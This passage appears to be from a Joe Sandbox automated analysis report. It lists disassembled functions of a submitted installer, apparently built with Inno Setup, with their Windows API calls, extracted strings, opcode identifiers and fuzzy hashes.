                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,0045C016), ref: 0045BF4F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: c4ef4bc2e753c798f4f219e8f4b24b78eea389d3c77b177ec4b9d52599943b5a
                                                                          • Instruction ID: 2913e94657538f1a306bb7ed27eed344dd43a6c30afdb59308231f58c8b71720
                                                                          • Opcode Fuzzy Hash: c4ef4bc2e753c798f4f219e8f4b24b78eea389d3c77b177ec4b9d52599943b5a
                                                                          • Instruction Fuzzy Hash: FCD0E9B17557045BDF90EE794C81B0237D8BB48701F5084666908DB286E774E8048E58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406EB0 Relevance: 1.3, APIs: 1, Instructions: 3COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID:
                                                                          • API String ID: 2962429428-0
                                                                          • Opcode ID: ce9819a0c299784ac39983e171dfc3d0d3373cd0e3bd5e96c40e619c76bc7acf
                                                                          • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                          • Opcode Fuzzy Hash: ce9819a0c299784ac39983e171dfc3d0d3373cd0e3bd5e96c40e619c76bc7acf
                                                                          • Instruction Fuzzy Hash:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 0044AEEC Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 252libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0044AE98: GetVersionExA.KERNEL32(00000094), ref: 0044AEB5
                                                                          • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F009,00492971), ref: 0044AF13
                                                                          • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AF2B
                                                                          • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AF3D
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF4F
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF61
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF73
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF85
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF97
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AFA9
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AFBB
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AFCD
                                                                          • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AFDF
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFF1
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B003
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B015
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B027
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B039
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B04B
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B05D
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B06F
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B081
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B093
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B0A5
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B0B7
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B0C9
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B0DB
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B0ED
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B0FF
                                                                          • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B111
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B123
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B135
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B147
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B159
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B16B
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B17D
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B18F
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B1A1
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B1B3
                                                                          • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B1C5
                                                                          • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B1D7
                                                                          • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B1E9
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B1FB
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B20D
                                                                          • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B21F
                                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B231
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B243
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B255
                                                                          • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B267
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$LibraryLoadVersion
                                                                          • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                          • API String ID: 1968650500-2910565190
                                                                          • Opcode ID: 5a45ccbf4a1a9fffc540ac45431ca0f32488a1cb66156aa5fb789ea7b16ff6be
                                                                          • Instruction ID: 3769fa21ef169b5859ff7299002385904a822408566faed309fb3dc54f14a28c
                                                                          • Opcode Fuzzy Hash: 5a45ccbf4a1a9fffc540ac45431ca0f32488a1cb66156aa5fb789ea7b16ff6be
                                                                          • Instruction Fuzzy Hash: 3891C2F0A40B50EBEF00EBF5D886E2A32A8EA56B1471445BBB444EF295D77CC8058F5D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004569D4 Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 186pipeprocessfileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00456A3B
                                                                          • QueryPerformanceCounter.KERNEL32(02113858,00000000,00456CCE,?,?,02113858,00000000,?,004573CA,?,02113858,00000000), ref: 00456A44
                                                                          • GetSystemTimeAsFileTime.KERNEL32(02113858,02113858), ref: 00456A4E
                                                                          • GetCurrentProcessId.KERNEL32(?,02113858,00000000,00456CCE,?,?,02113858,00000000,?,004573CA,?,02113858,00000000), ref: 00456A57
                                                                          • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00456ACD
                                                                          • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02113858,02113858), ref: 00456ADB
                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00493A80,00000003,00000000,00000000,00000000,00456C8A), ref: 00456B23
                                                                          • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00456C79,?,00000000,C0000000,00000000,00493A80,00000003,00000000,00000000,00000000,00456C8A), ref: 00456B5C
                                                                            • Part of subcall function 0042D7A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D7B3
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00456C05
                                                                          • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00456C3B
                                                                          • CloseHandle.KERNEL32(000000FF,00456C80,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00456C73
                                                                            • Part of subcall function 00451E20: GetLastError.KERNEL32(00000000,00452891,00000005,00000000,004528C6,?,?,00000000,00494628,00000004,00000000,00000000,00000000,?,004921BD,00000000), ref: 00451E23
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                          • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                          • API String ID: 770386003-3271284199
                                                                          • Opcode ID: 5006241aebc6898b4b8c5a0b3d2f1eafd7ba10c83dc686a4641eb2167e0a9961
                                                                          • Instruction ID: 1494ba0c9f092ba5553c36d9802a3eccbba6a72ce31e74165ab773d774e4cee1
                                                                          • Opcode Fuzzy Hash: 5006241aebc6898b4b8c5a0b3d2f1eafd7ba10c83dc686a4641eb2167e0a9961
                                                                          • Instruction Fuzzy Hash: 90714570A003449FDB11DB69CC41B9EBBF8EB09305F5185BAF908FB282D77859488F69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0045AEE4 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 182libraryloadermemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetVersion.KERNEL32 ref: 0045AEFE
                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045AF1E
                                                                          • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045AF2B
                                                                          • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045AF38
                                                                          • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045AF46
                                                                            • Part of subcall function 0045ADEC: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045AE8B,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045AE65
                                                                          • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045B139,?,?,00000000), ref: 0045AFFF
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045B139,?,?,00000000), ref: 0045B008
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                          • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                          • API String ID: 59345061-4263478283
                                                                          • Opcode ID: 2e1c75f00da70986db0bef7873a233c0400535374564b15abc59da2f2a3f743b
                                                                          • Instruction ID: e1143608cea91b2c9fc6243bba76dd5dc8e0698664409433b5fa99cab1fe32bf
                                                                          • Opcode Fuzzy Hash: 2e1c75f00da70986db0bef7873a233c0400535374564b15abc59da2f2a3f743b
                                                                          • Instruction Fuzzy Hash: 275191B1900608EFDB10DF99C851BAFB7B8EB09751F14806AF915B7381C3389948CFA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004734AC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 77COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ShellExecuteEx.SHELL32(0000003C), ref: 004734FF
                                                                          • GetLastError.KERNEL32(?,?), ref: 00473508
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00473555
                                                                          • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00473579
                                                                          • CloseHandle.KERNEL32(00000000,004735AA,00000000,00000000,000000FF,000000FF,00000000,004735A3,?,?,?), ref: 0047359D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCodeErrorExecuteExitHandleLastMultipleObjectsProcessShellWait
                                                                          • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                          • API String ID: 171997614-221126205
                                                                          • Opcode ID: 468cd06050aeac50d7fc6c39a96f1f48007959102f91cd93909f9b3bed5077f9
                                                                          • Instruction ID: 9270c58e3c51a63ec14468394db3a8dd1a523cee094c78596453f11dd74f1eb5
                                                                          • Opcode Fuzzy Hash: 468cd06050aeac50d7fc6c39a96f1f48007959102f91cd93909f9b3bed5077f9
                                                                          • Instruction Fuzzy Hash: F72177B0A00114BEDB11EFA99842BDE76E8EB04309F50847BF508E7382DB7C8B059B5D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004227CC Relevance: 18.3, APIs: 12, Instructions: 255windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422964
                                                                          • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422B2E), ref: 00422974
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendShowWindow
                                                                          • String ID:
                                                                          • API String ID: 1631623395-0
                                                                          • Opcode ID: 922aa224a59eb388fd409ef1a4572993a041e07f03dc34a9f221e61418859b32
                                                                          • Instruction ID: 2ef64a615a047e5f68810d1bba8f9c023c2191b8b92af7ee41424443907fb462
                                                                          • Opcode Fuzzy Hash: 922aa224a59eb388fd409ef1a4572993a041e07f03dc34a9f221e61418859b32
                                                                          • Instruction Fuzzy Hash: F0919271B04214FFD710EBA9DA86F9D77F4AB09304F5100B6F504AB3A2C778AE419B58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004182F4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 00418303
                                                                          • GetWindowPlacement.USER32(?,0000002C), ref: 00418320
                                                                          • GetWindowRect.USER32(?), ref: 0041833C
                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 0041834A
                                                                          • GetWindowLongA.USER32(?,000000F8), ref: 0041835F
                                                                          • ScreenToClient.USER32(00000000), ref: 00418368
                                                                          • ScreenToClient.USER32(00000000,?), ref: 00418373
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                          • String ID: ,
                                                                          • API String ID: 2266315723-3772416878
                                                                          • Opcode ID: e2831b492a02c7fbc1c424da0d3d82ddc563106dbc431b226c0011ccd89e5e33
                                                                          • Instruction ID: 9cf88c6662a8b54f2d940af1896da5675c8924d24fa9a5d7825e36bf04e718ba
                                                                          • Opcode Fuzzy Hash: e2831b492a02c7fbc1c424da0d3d82ddc563106dbc431b226c0011ccd89e5e33
                                                                          • Instruction Fuzzy Hash: 40112B71505201AFDB00DF69C885F9B77E8AF49314F18067EBD58DB286C739D900CB69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00478334 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 195fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00000000,004785FA,?,00000000,?,00000000,?,0047873E,00000000,00000000), ref: 00478395
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,004784A5,?,00000000,?,?,?,?,00000000,004785FA,?,00000000,?,00000000), ref: 00478481
                                                                          • FindClose.KERNEL32(000000FF,004784AC,004784A5,?,00000000,?,?,?,?,00000000,004785FA,?,00000000,?,00000000), ref: 0047849F
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000,004785FA,?,00000000,?,00000000,?,0047873E,00000000), ref: 004784F8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$First$CloseNext
                                                                          • String ID: dF
                                                                          • API String ID: 2001080981-2048908954
                                                                          • Opcode ID: e3d3b5ea0d471a75f1e892318c37568382ec9ab9af60859860025bbf46b96970
                                                                          • Instruction ID: 1e7589c0754ebee773f1854eaa6e10daa326bf9e4fcfb169a8671094cc7bf5de
                                                                          • Opcode Fuzzy Hash: e3d3b5ea0d471a75f1e892318c37568382ec9ab9af60859860025bbf46b96970
                                                                          • Instruction Fuzzy Hash: 55713F7090020DAFCF11EFA5CC45ADFBBB9EB49304F5084AAE408A7291DB799B45CF59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00453D4C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000028), ref: 00453D5B
                                                                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00453D61
                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00453D7A
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00453DA1
                                                                          • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00453DA6
                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00453DB7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                          • String ID: SeShutdownPrivilege
                                                                          • API String ID: 107509674-3733053543
                                                                          • Opcode ID: 97208243a47202ed253c42c48129ddaf64d2c6fbfffe2a3ff53d5c10fd5cf2c8
                                                                          • Instruction ID: d8781a87663673bff4f7e6514a95c709f3d412548914224523031170f5c416b5
                                                                          • Opcode Fuzzy Hash: 97208243a47202ed253c42c48129ddaf64d2c6fbfffe2a3ff53d5c10fd5cf2c8
                                                                          • Instruction Fuzzy Hash: 4EF0687039470675E610AE71CD07F6B21F89B40B8BF50482ABD45EA1C3D6BCD60C4A6E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0045B4AC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 34libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045B4B5
                                                                          • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045B4C5
                                                                          • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045B4D5
                                                                          • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047A0C3,00000000,0047A0EC), ref: 0045B4FA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$CryptVersion
                                                                          • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                          • API String ID: 1951258720-508647305
                                                                          • Opcode ID: 066b20a5c1c1bbf827e7ba668025f4c9a0b11cdabd4051e249f6bd47f2c53a5d
                                                                          • Instruction ID: 5c97a33bf6e4b00775a7c8e6a9d5d7120da5cee44da396d260546e37c2af37dc
                                                                          • Opcode Fuzzy Hash: 066b20a5c1c1bbf827e7ba668025f4c9a0b11cdabd4051e249f6bd47f2c53a5d
                                                                          • Instruction Fuzzy Hash: E5F012B150170DEEE758DF76EC85A263695E7EC31EF14803B6405551BEE778044ACA1C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00491EBC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00491FFA,?,?,00000000,00494628,?,00492184,00000000,004921D8,?,?,00000000,00494628), ref: 00491F13
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00491F96
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,00491FD2,?,00000000,?,00000000,00491FFA,?,?,00000000,00494628,?,00492184,00000000), ref: 00491FAE
                                                                          • FindClose.KERNEL32(000000FF,00491FD9,00491FD2,?,00000000,?,00000000,00491FFA,?,?,00000000,00494628,?,00492184,00000000,004921D8), ref: 00491FCC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$AttributesCloseFirstNext
                                                                          • String ID: isRS-$isRS-???.tmp
                                                                          • API String ID: 134685335-3422211394
                                                                          • Opcode ID: 5f65020aef3fb45fb11887bb1f6e63c6b85ff76842c9e0dedd88080743c31966
                                                                          • Instruction ID: 691f2d73da31f32e7dea4a5c2fc00664967572ef0d2ca01005a435b1a41f50a9
